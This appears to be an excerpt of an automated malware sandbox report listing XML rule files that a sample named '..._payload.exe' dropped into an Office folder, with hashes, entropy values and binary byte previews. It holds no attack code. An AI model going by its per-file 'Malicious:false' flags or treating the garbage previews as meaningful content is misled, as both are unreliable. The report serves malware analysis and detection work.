                                                                                                                                                                      Size (bytes):1736
                                                                                                                                                                      Entropy (8bit):7.875220822034112
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2Ncl79VqzW9Z0UmsDgeiSZc82NeEqrqwLrD:qS7OGZ0cAh82kz
                                                                                                                                                                      MD5:531A8F253F6B2B21EC48ECB5AE88D437
                                                                                                                                                                      SHA1:14FB6AEB0F570CBD465A13D581604CD105B33B61
                                                                                                                                                                      SHA-256:C99FECCA147B70684B832CD46CC89C7D0EC5EC3AA5760ECE1F5378994058B561
                                                                                                                                                                      SHA-512:2073E41F49CA05493D254B80FD69615A57CA62CC922BE5E786E4C24582604B374A8247150885CE2B7CACBFFFAF3AA7FB89C98CAC8C8B01E529E6F26C2B952FDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml3.pj.k..$..}....=S...[6............?.-..] .G:...RW.1...{....1d.......=.s.K.l;3..PJ#..By...8.C.+.)..7.n2..2.$.......5....R..n.{..dpL.n....P.S...T...6-]q^h..p.|..UM....m.yH.`.f..y.Bu.....fd..rn..9....O@...:...J......-b.6.Vf...f.....m....5......hN....j.b._...-.T....ux....p.......qy.`...\......Xn..(^'.7).R.bf.....!..1U.\sj...bg2.h.............~i2/.. ..\.{,.. E..U./j...[.`.N.g...vU..&...._..-.+v...OL...7/w.E.R.2N...Nu....sf|$Nu....'...b..B.@n.b.6Z.z^.H.3W:.!......i{....n.fnU=L....s............gp}.B....^(U)..s..W`.k...e/.{..J.T":H...P.2Tg@...\..z.v^.w.....(n....J....p#.F8r...d..`...*v..9B.].{.R.J....4.U..._....V.S.1.TX.l............@..b...x.).....U.^=C......h$`..N8.f.......N...v...+6...C~kV\x5....g..G.z~...O.......<..z..G....../...BC....`Vj.....1.,e.P....c........=:!.,.WiN...pa.....B.u.+..W...4."V_g...A...\.'...Q.......O...3.#m....XV{}J. ..VBMM.f1...U.`.*\{.<..9.h..l@^.cZs.&B./.{.9.....K......zH.9....HV)u. ]=g\......M11.0...#../?p....*.:`q..l.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702800v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1687
                                                                                                                                                                      Entropy (8bit):7.8834085777364145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:yZ+1Rn8fNOzRzuUBZnDZTsQiRPHf8OS8D:G+/8fNOzRznTDZ9UHfS4
                                                                                                                                                                      MD5:342F1F0ADCF1D0C00647013C8B609B91
                                                                                                                                                                      SHA1:AACBD8CAB8B76A2EA308AAFAD96436A8BA9DB5F9
                                                                                                                                                                      SHA-256:B35F4B692BDD5687E2E1C59B5A30F087DB28D6AD22B34FBE1911B0748D7414C0
                                                                                                                                                                      SHA-512:BD7C4BA71970D628E8CF6F17E143BD9345F0B68EB9B57F8B1D25CF1DA11147A7955B0A9372D96B7690D98D5EBAC8B7EE8911FB318639E3329E286CF630742123
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..K...s....|..^..;...^~...@o#.|P........9X.}..K...L.....+.....Y....!pi..Al.....+....0.....3.,i.Q.1\n....G1..t1\..}{W.r..s4..Uyy..q...x.{....}....|...sRs.<.9I.+A......-.+..Xl...-.^..eRAH-.....B .0g..{/Y|.)..TE.R...!.....z.g.&...y...i.....h..=...M.C..}.xa@......RI...1.T{...^.1.rj.......5 .8#..>...E+./.r....(..+..k..}.[.Q4..B...B..f...8......j.^...3..|.p...K.....E...dh......7...v...b.'...q...J...Q4.Z.n.`m..~-X...T..0....d.A...F.....@h..B..v.!Yh.:@4......f_...._....f,b.JI1.1B.(.J...2..}....o...5..XZ..*....".....tb.d.{('...`ABm.^k>.Di.....B.HhD......|....`...BJo..B.4.%...8,.@.nV.P9E..e6!...&.!.T......]....W......m..]....H..........F..c}....v..Z[:x./.....b.#s.l..k...n..%.P8[.O@f......n...Q.Ze..2.yB.Y?X.SN@.bs.`...]=....h........~.....*.q.6..Y..H..B{.n1..2.k!..t.n.p...y[K..!.L.b..=r#... .0|.+...B....1.5E$J..6..5|..q..0.Y.......7...<....;...nW.z..\x....' :.W....#.E...W}8.z.e]..I."...'..D..?......G.)E(`......1HA...`Gly.e....O..j..u.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702801v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1724
                                                                                                                                                                      Entropy (8bit):7.89020918004927
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5ItdC+kflvKL468DBBW8XoPsQaqvPp3x3sR0D:SdUg8Ivb3sRg
                                                                                                                                                                      MD5:E9E2F4CCD5B259B330D15630E95BC0F0
                                                                                                                                                                      SHA1:4DD95DE05EAE253321D579E6C275CAD7993AF8B3
                                                                                                                                                                      SHA-256:F0149542DDBA42BF81CDB570F3084F448BDFE6EEA338302247091A5B7F646B58
                                                                                                                                                                      SHA-512:0A9C1CA9E0CED4B807E2D666ECC420B9F38A41970D1D56D91F7F549E421A6011889AAEF7D68862560F651EC04C0281290190CDDB2C1FD94886DF07813C516C65
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....C.U.2.z...M.V....,...r.ic.A....{3[F.2......XQ$...T.!.z....^....vN......-.&...?.l...!.}h1w....M.[.XW.d+.+p.}...i_%..f}...Y.e.)m.#..b..z.O.]!R~..).q.Q..N...P....u`.b..j.x.n.k.S.B]..H..a..B[U .)....qz...Uu.u...6._.....`...Ur.U].?.k.......|.+..#.4D.2...G5r"....|.L......7....PH=....O..`?_.y...z...7.!VA.$..qn..q`b..b..C...K...Z..yA.[.8.$fR..L.........h.Fqcg\sL4[.:........,,....SR.<o....1,.`XM.9Cn..`...gs.3...^..g..C.<....B}.......A`.O94[..........R.{.(.j....w......>.u.N.c..3..8.;.S.Z...P.c..&........m..V....>..A..@.<..A...m"./..I.L....^.0f.Ujd..:7d..R.e.6.....a.^r9.h.!.....l...o..REb..z...n..M.. a..i.@.;..e....5.S...f.<..8{.tp....0F.$x...}..?Q..Bv..c).a..].{.w..%.d...92K...f...fw.nS..~;d..loX..c..U.4..4..~..0..........a*$..d.6,..8.w.....j....<.].J..|9......>.*:..S{.d......KV.?....9.Z...v|=6...&A...A_g5..:.Lbj.b...."..kH.."..F....B..H..|.)..c....+.....1...2..."..)e9{.H.A.E|.....R....gX".Zl....i...'.[..K.....p6%.?.Q...M.H.[....Z.7.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702850v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1701
                                                                                                                                                                      Entropy (8bit):7.8887210396808936
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:xOLyUhrwhDy3i56f7OqORdEIuA1G7HRND:YeEaDqi56KeR
                                                                                                                                                                      MD5:72AAFDA2A4AAAD94F45419D85E2B14F2
                                                                                                                                                                      SHA1:354A52A733E8DBDA2AC08A6593858EBA0FF7F0F3
                                                                                                                                                                      SHA-256:5B0C34D7DA73711670DFA5C066F543B8D35E59E14A2E47B86AA576087834C64D
                                                                                                                                                                      SHA-512:20E5B47FEC7A183F867D4F6E2489AA4D776513D6096A4D5FCFF4A435667085EB184AFBD126CB468B29F44D09488B41FDC7E6A14ED8A0041DCFE3DA766872C517
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlsV......6m.g.....@.K.`..S.8{..M=Tau.s.lw....~...M..&..x.'.t...6...fg[..6S..mlL...U..rCn....*.R.....J:..5....I...~K.1....C...j.,XD.V....c.C......"DB.."cC.0...+=...f...T'.."....S.x....w.j.D....j.*..=...}w..}..6..a....&..`[..*P..J.v........D..EYss.Je-.W..CJ-s...H.|L;[..O#..0.......!z9.m...qFU<.NW.9.'...?."....nd.....K.H.02-g..J.O..(7h...cQ...v........"..@;-.....].!.B....rX..5...!.v.C..2-...W.,.&.X.]..?.]S....)O..I1..b.7{#......^be....=.....>..........i+..@..5....^...g.A..q.</..^.e..}H...g.q....9.$..m....l..k2)Fll.:rztT...&F..+..#+c.E....._.!.@^..$..U..[.<..}.m...g.5.8..L.0.....A...w..&/^.=..s...r..\Q.o....]...4M.`@.......Q.LVn5....>...M`.....6........].3.&.....|....;.U..(.~y1Cg_.im.m..(..d...n.H.:m......,l.3.....Y....P..S......s=x..n....p.S..x...F...9..B.......a..{.....&D<yN&:g._ol.....w...%^2..AR.3..o.?.......$..F. .O.,p..].J_;......a.....D21..?V.=..v....Um6.....3v.v.O.N...H..oz8...@.&..gw.. ..W..wj...ET.. w...D...f 7....W.|F..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702851v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.878534359479266
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:pLsxiiIsqcn12f3l4kGpSluC1WdFGAXbW5rc5HN0eaS8F/D:ViIsVDY9WFxuOCesFr
                                                                                                                                                                      MD5:48517AC4B6233ECB9793FF07C5EE9DB8
                                                                                                                                                                      SHA1:02504F90F44C53194D5D189ABC0DD8798D6CD5FC
                                                                                                                                                                      SHA-256:47DF8FC275747AC2A8129D8AF94FEB93522D49F47D0274BC08AF21B51F04C829
                                                                                                                                                                      SHA-512:B7CC895D2FAC9F32BCCBF8FABC342C4D9E6243EBD413898729A992C54219616F0A98196A638C6D75F18A17D3912ED97F237A2D43E1A56291C3D98C81E62B98F6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...t..........g.'@..([......u"....>.J.O.l..`t..{_"....{l..A...Aj_G.LB...*..4s&R.|....4...F.R.-......m.......y.b.T./..:.....pV..|..k.6W./~...{]..-d......R.D.V....4....G_...g....E...Ci.bsb.O.62..PpK...M.^L....R...n..=........zs.0..U....n]ie...d.`.Cl.........p]..O.....T...m.V'.t.N.]"[O.9i..r]..."Sv...| .DV....j&...^Q...........R@..|...u...{jh..Ot..3.Y.S.U.ya..ZR~....R....${5A...5.c..i.r.._<....n.J.p...xg....Z......?.Ooi....^....m..6.-.."Op.EAy..E.kHWywj.7.U.>..E..=............U*R.].u.....!.=....4...+w.q....B.Gr..h.<.a..{..*=qA6_3....l.<...C.i..x..^...`H..uu...{.o1:^.H..D...J...Q.4H..d...d.!.x.%5...V...._ *..*&yi.....O..D.....(F}.17....{..........x>..1d..f...f.......x.M..ir..$...a.7M4...H.G)&h9..Y.E..Z.+!.L.#.~F.e.W....#t.*.......5.2...A....af|.#..0WV^.....]]t......Q.q..;..-..).92.It.....n.yG...;G..F.5.."..Q...ki8..B.-.R.Q....#}5X.....CJ..m#.X?{........po..N....E.2.Y6.8@\..J7...3..`o|.I.<<..G..VR..t..X1......y.K..p.f.mC..3..r......F!.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702900v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1707
                                                                                                                                                                      Entropy (8bit):7.895448634691019
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zzMnQBgFvDg7V7LqaMdY7ZAZaKwMrm6HyrGng+OfcwW7gyZv2fINVc/STXGgmViK:zQQBgp6qPdY7ZAgmHmUUfcjZZaIySED
                                                                                                                                                                      MD5:98AC3B507D4BE7E8E4160E7D230BA14C
                                                                                                                                                                      SHA1:3999E103519BB601F0F1C346E4F5A12996C478FD
                                                                                                                                                                      SHA-256:474C27EEBF44295ECE8CF2BC0239C62DA1FBF8D68ED5DF6ABB2E2072A0511272
                                                                                                                                                                      SHA-512:1F5B660390945D5E219BCAAE107CD9B590B94E3C21AB3A2809342111A455BDC1244243CA674A1C76E5B5758909C473227F9A68EFCB34C9DF7E7C8E92ED34E76B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....IK.r...>.r..J'1..N...Mq.)e0C{M.........mz...%.i..?-.jc...]&.2Yh..\./....*.oH.._.9.+.....].[..G...........X.V56./..L%:.N.....R.IR/&.....$.$...Mt`.._.&...........E.m.....%...u....%...[f..#.bh.....P...#....d;. .~;..kQ.V.[La...o.s....X.A;.K.J...az...LJ..Hq4..`.....Rz_8.2...$(.>.P.r.Mm...K..Vb...f......(.S..c...u...VM.T..?KB~......'.h......]\..Y$.K..Q^...{B.vZc...e1W..h1...+...M2..2..........._.#..w.....yT..d...kC.>...H......vJH...g@2.!....@..{......s.e.....N.....$Z....Z/..<..V..^...j....M..5..N...!.>s..`..v.l.0tr {..>...*:2.../.q......v..k..':../.u.(.......-.I...k....D.......Td..JX....nQ.C ...=....Z.N..B...s.......m..^j..o..O<.(..E.}.~..v .*Y).JQ.7<%...(9+....^._^..0r.'.^...6)s........ ...P...*..Q.s.h..,J....n...J..,V.~..0;.Wt.^.}........G..h..n.\tv..%..+..8..Dp.......K.....1.......al..TI{...\RW]#..}.l.......'C.7....G....5e....K.....,..wb/.p...y*..Zr;.i.yqS.Y.$<?|v.. gLH....'.>..a.5....g.Zf..bZv#.......M.gn..4^..W....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702901v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                      Entropy (8bit):7.873588591905996
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:jp9Cs8e/RU5Un0ag1ZA95l/5dG1FFhb5AuD:CstR15EfmW
                                                                                                                                                                      MD5:671B69B80B67F986F1674DB9D38C6AC1
                                                                                                                                                                      SHA1:0992457584F94E504EA39013FD26C075A56ECFE6
                                                                                                                                                                      SHA-256:ED5B63FD8591E64683FC1F919FDA3094BADE126AC4043A17F3CE35BF23398B70
                                                                                                                                                                      SHA-512:FF212EF2DD7662C4E0ECF54BB6973E94C43776CEB5A90C82AA4AF788F8FDEAAF88A483A4C2A218FC055A38623F921A33FF6C3A3DF64A22FB499445613F32CF9E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlH$.:u..#t1..W<Q{..9.%..'..h.|@...rX.<69....$..x3....m\5.1..$.&T.X .,.LH.|..<;.-....5;I{..3..X...+.Q.".....T...zo.)D$.L.T...#.."p....N.^..W.......].../p.?..Bp7..B.&r.;..~E.6!...%..H.J8..j..&.1*..1...;y ..*.....].....J.`.o.....Lu...E..A....([...0?...1r....5.6!........e.K|...zr.../.V.c..3...,....$.Vke....*..Q.a.T..J....'!.\C......y(f...U..1GW.3...L.......Z...ZTd.......bA.......>...).........>..99X.[}w_7.B...?...s....M..O.S.e]j......*D.b+.;.]l.=I6..Y....e.A5..x...6Q d7'.....D..|...a..M.C'....,s...l..J....R.&uf...h.....&a.Y...$`.5.........P..L.S...4.L.$B.?-0.}..^.hD...i.d#.>V.6....!.0....P"jv ..../.0._.Z. N.....M..'....a.=.:Y...5C...b.N..Z.......P NG,py...-p.R.:.]Mf.5E.Td....~....m.A.....}.......&..7.....g+..I.'..~..w..B.N(...5..(.$.M6.Y$........s*h}R..G....LzS...y..y;Q8....m..........S..../h..5...e.L3].."F..YA....lk.g..1.d...E.T.9...CJi....g.E)p.VlX.7.`/..[.<...Ey.....P..$....r|....!...v..D.........P.?x.0...`..;..b.C*.N..K:$...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702950v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1701
                                                                                                                                                                      Entropy (8bit):7.8983802067567535
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SClcU5Gb6ei6Av1F/2gLppEhE/2UkhU2O9b9WEkx6zslxzmMh68zDNKhlLi1eh2X:Si1Z7dF5bV8zOru6zslxzt7zDCL2PD
                                                                                                                                                                      MD5:0B510DCCA6A228C7B538B93501B3AE1F
                                                                                                                                                                      SHA1:5E69AF284E47DBD6B8F23B42F1764B059C6D500A
                                                                                                                                                                      SHA-256:68B63786022AA183ED63569EADE173C953507B7D3DD2882EF8F4458039A6C14D
                                                                                                                                                                      SHA-512:6BEA5DC797C84AFA7FBE8B3D256A316FB4237D9AAAF56C59EDA96780655625E7E0679530838E0B6B9BC6D3812665CDFBE78B303048531A80D456887457E65CE8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlg.S@.0....z....._.......(......}Gc........?!_..A$..2V.3.I..\.8\...(...:b8}..:..5..BK..uxi.5...z....-..RXq.d9.........f...^...ZJ..bq.y..yZ..K....:P..7+_.W+.'....F.Y...)?$t.:`"7r9%.......!`...an|.......R]&b....$]+..f!.6..Z.!..".p.q.....s..-{R..y...M..j..!K...U'....V.>.>.wB.#..^..0/..'zK.]7y....n....../1.....3.r\.o.,...q..].>.-0W...ml......{.z(..9\.ga_P.....7...`P.<ph....9..-.(..hp.6..`&..z.K.^...X......h.....].C....."...S2v..L.IT[WY-m.F.&..`5.k.......wxo.1..N.x..-..bI.C.|...H.f8..[.R;k..m....v.....m.).....J.....Y....T.5......N...'~.2..c..0>.....O....D.....X-N..l.....C.>r..a.....0...r..4..e.......N`.{...o:.A.n..kje.....U.M......0?.......s.....)....3.....N.3.|..QH?&.S.fW...]..q8K....!3..r......<2..K]..M.. \...6.]cD..A....,\.N......b.\.:..-..[..6Z...(K..>3.pE.T`..Nk.{iS..\.3RU.....#....a..jw..c.D.p....M....}^....*..........r...#....7@q...M..~..`.y.....#......Y/L.........7.....h...i..m.=.8.v|S #....K&..$U....pU.....G.m...D........3..*

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702951v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.89532212215821
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:CsHx82cWl2q5Iizoq8f3AZWzpu1ToY7hWGNr9WEZD:FRg4zoq8f/S0QAGzWER
                                                                                                                                                                      MD5:120FE6C3EE326EDE648917901A607307
                                                                                                                                                                      SHA1:4BA40A91B8783E6F57304674A025C4E228818566
                                                                                                                                                                      SHA-256:1C66418A7DE0CF806D99062B035CA717EF18000940C63F20DBB2DE2CE944C447
                                                                                                                                                                      SHA-512:8F1AEEDB750E82B3CBFA4F94EF16186642BA5620B2CDB5C8E551E0C431B113F258332554217E48839D4A344624FAE3CB78FF9836EE00505E7B7C4168E5CFCC84
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.k.....@|......D...veT....d.G$.Y..z.:...?.0^V.-..8...d..U..>..=..0*.fV. ..{.*3.l.....D.D.s...g..#td..kn.G...ha.\d....;....lC....a..}.l.....9.S.f..).4".<.....].'PH.|.Uo&q......M..0..c.#.....o...9.n.g....Z...ANU...l9H.^+.I.......o..q.Cq.b"..X^..~.../f....(8.3..+K.[p&..4&.!@.=..XX..........v5[...gc8....U.....-....>j..|i.K....@G.+.0+0.........wc.'....$....."t/7..|.s.KZ.....%.2.%...E.MiW.v.%.....f....-N ....B......1S.#....a.g..|U..j1.>x3..I).r...F......&.;.c\.......].s..)......&...R....u.=?...e.y..oX........-|).../l.c....C....}nT...=....UL..^....F.&.....T....D)<;.....o.PL.@.....&.'.....f..6X..#...<....5x.7....2)...=.=<j.m.~.sXS....t^ON.IH.k~1+...........#?.....u.......k......9E..!.O'..@*..z..y.-t.r...y^,E..}.5..0...j...X..&sG......t+|.>k....~0$pz..Q...F..L.)tOs,.9./[3zK..u=.9.$.tW..q...-g$.d.@...A.bF.x..7cd...P.|~G.,...Y.......[.+E._o...p.>.........V.^nD.....~D...))...t.....B.;...8..q._..)...#..Wn.i6g...|p..sU.!.*%.`oJ.T|..P7..[.t....,x.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1702
                                                                                                                                                                      Entropy (8bit):7.890698955592828
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:WlC/qoiN8A2MODjnxnD4LuMYTXidD190wMWx/itD:WlCliN8zMmjnF4aMYTyJE9V
                                                                                                                                                                      MD5:A176C2A4E97058148E02FA7090B2A75B
                                                                                                                                                                      SHA1:82DA98E644845FFE66DB11FB5F138758D02118BF
                                                                                                                                                                      SHA-256:C0E46EEBE1B47E851D7C5104CE5C443B16613EB09483091F9C96E8B476BA615B
                                                                                                                                                                      SHA-512:D1C782B4A67FD84B7423EDE8CB347E3A98D62C93D68E7101F1A2BA40DBD9EF4813420A422803B830594997143088325CAD8BFF2BFCB5C6BBC3E4A4614EA5FE9C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmll....Z.......UtP.AN.-...mB............z....A.AgI..1..U9..a..'a...o[......b}9;..!....n..}`..........]&$.j.L(....W...... 8c..R.G..C.?......R.^.;...gS=....w........q...@.ev....k-V....w.....l..3v.aG..-f....@......W#3...F._6. 6.....h.f..|.L......E..qL.Z..........?..}.~.eR......0.....S%Z.K...1x...o........w..n&m'<...v.K........d...a......({m_.....h..=.....R........S.W..%$.t~-..%...:g.G..v.......+N.V.>R"X<B.|l....5....v..........7...[^..K$E.y...8B..|.U3z.{+..].4....f#.f....x....V.......H.=}..C.n.zA.4n.*...;.U.4;.e.Z(H.....|9.8gt.n.G.C......>...wz..T..J.6..x.[..D..4. ..c...m....N...m.....;.....;]...J .R{..,b..f.v...GO..8L...l...x[....*.=...jR.up..... ...vHJ;....-..U>.K............,A.x>P;..":..).y...z.Q.0x..8TIxe.|.G...p.m:.Jl..L.Xn.c.3..y..l..<.`...f4..`$..B..;cv.,....o._J..n..6.....X.u#:.c...s...r........L^.59..J.k...L.....-.>q.:..).[$x..$..,1P>F..0.e. W..g.T..I_.....U."..O........i..ZR.,.W.....~rBUJ..K...w.,.a..".<....ND.X..(zO..0..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703001v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.884782147922429
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FfFbcXROTxYBH4SKi/5PLMBi2xpLezwsHYfXwsZd0/TR2D:F1gR0biZMU2vLezwsHe0tu
                                                                                                                                                                      MD5:707FB086CE2A408B6D4A512FD7C28038
                                                                                                                                                                      SHA1:1DA87C718366138DD4850E9EFFC0AAAEB4FA2927
                                                                                                                                                                      SHA-256:A40603B3C6D0C6A1CC998CD0127249A797CACDFBC9A64947F0A1B222C43F4ACF
                                                                                                                                                                      SHA-512:245D03AA523E8266CAB7ADFA3CF0AB6E98BFB65E8C1038AA142ECAF09DF95F47B63739016C437ACADDC57C6675C79D79D1DB63283FE16D7502D62F7F6F02D67A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..c..5.N"..q./.u...HUX.D...x.$._..d.4.lh..YI.7../...t,..D.k1.&.g.>i.....x.*._....3.P.l.f...}.{e...Ao.i1...?.'..Sa..x...%W.T.A.....).e.x(.@.....*....?...&%..5_*.R.4.b.....U...D..2.n%C[bN.F.I._e@....F.....gRT..t+u.-.=.B.....O.V...y..=...k88...L.Yk4..e[.vq........y.....s..,..m<R{..S.U. !Cb....T.u.Z%..1b.....L...Rm.7M.U....<2..s..y.~~.b..x...E..\..OsYq...a.$%W9..;...v....<U..xR.b...)^.....a..d.DM.G..8*Ws.d.q.....B..:...Y...k...M.9.Pr.....u.'.:...`.#.p;$q.. .7..`].8.|.K..........P....K.W.....~.< ~..f"M..}2m'U.M0\U...Bg....D.pxBYp_........L:..,..,.......?nT]AC......3a-.3.6 .[..../(S...'.[.v..=..A.....(.t&.]...9O.. ..N.P......*..4......o.9l....qL....k{...../8...JkW.g7H.a....qY.(u....Bc......y.M.].Wz.}..c1.sY..Xa.......o.....%W....R0.j."N....(...f...7...JR...n..`....6......).'F....F...-....g..S.s..ZO....L.............[..ur'......I...<7.J.e.I..b.~.`y..DA.e..C.{.`.../Y|...rS\. ;.!..I.......Q.9]..[..X4N)..p.......:......".^....=..p.X..|.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703050v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1724
                                                                                                                                                                      Entropy (8bit):7.883830740179812
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5jbBQ6QFc6NzM8QNVMoFat05Q0E7YC47izdvgD:rQZ6UzGPwYOuWdv8
                                                                                                                                                                      MD5:7F314516A2714058C1A6F8B97876AC0B
                                                                                                                                                                      SHA1:5149F1D6E5F6DE4F7B203E787846FF66D7EC51C8
                                                                                                                                                                      SHA-256:8738CD94728CD55C97195FC403CA5365C43C542712BC35E9A60A6A3F4D3BEAF7
                                                                                                                                                                      SHA-512:CE6D12CDF86D20F085A705C396EAE2068554804582B12C54E7324D52596FF367B6BD79DF5C186CF18EDE2A27252F5491DB480B2878EE7AB42BB4A9736A942184
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Z~u.....\..S....mZU.d.k.....6......2V.K...o6...FL..5..F...2h....!.*?.5&....b.....@.S=./.-D.C.=.O3......%...^.<..sj.e.hR.I...W.3g..{_f...=.._Q......K..)....i\.@..$.|.../x.;lv.{..7..o%d......#{.gB..`...i.m..I!.\|.L*.&...xZthD.p....p......M:.Uu......X...-...6....4.>I...>S.z.5..Q...T....<]...F..j../f.......%x..u/..._}|.%....d...sv../..F+X.CO..7...m..."..<m.h.U...Z..#.Eu~Q.dk..Yt..gF..sJ...x..0)............ C[.Bt)...[Z.W.B..2{.y4.p...y ..=......4...P}D.86....L.&Qj.`....E.s`.m.i...../....m.(.i...I...C.d..^|..E*Y.#[S..r......<.Ljm.....Z.....g+Tl...5_.f..s. .j..b...=...J..l......H.......9..{CM..T&.<..S.$.u...1.....%<.F.........\8H%..7.....3..^W.jpOo:|......M{a&F..N./4...O..@H.....;......?S.9l.E.......1f....o...1m.%....Qg..0.....l....MkN.sx.....s....b....W.i...H.?..>..R....V.g.#.C....o.^.......~.Yg./.ev.R.........&....F=(.a......=....>_s.|...l.>.P...7x1I$qX.}..o.c.....w.......(.......@QK.-.o.LF.C.F.....o....}.!...L.dRQz..*E...;...[..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703051v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1761
                                                                                                                                                                      Entropy (8bit):7.887360877370458
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:XcXwX+4XjCTX5PCTB6roNd3OBoRVZeJ8fTsEFOqEuUmb1moNcNLNtPC42bD:MV4zC9CM86BozZA87siC90niftED
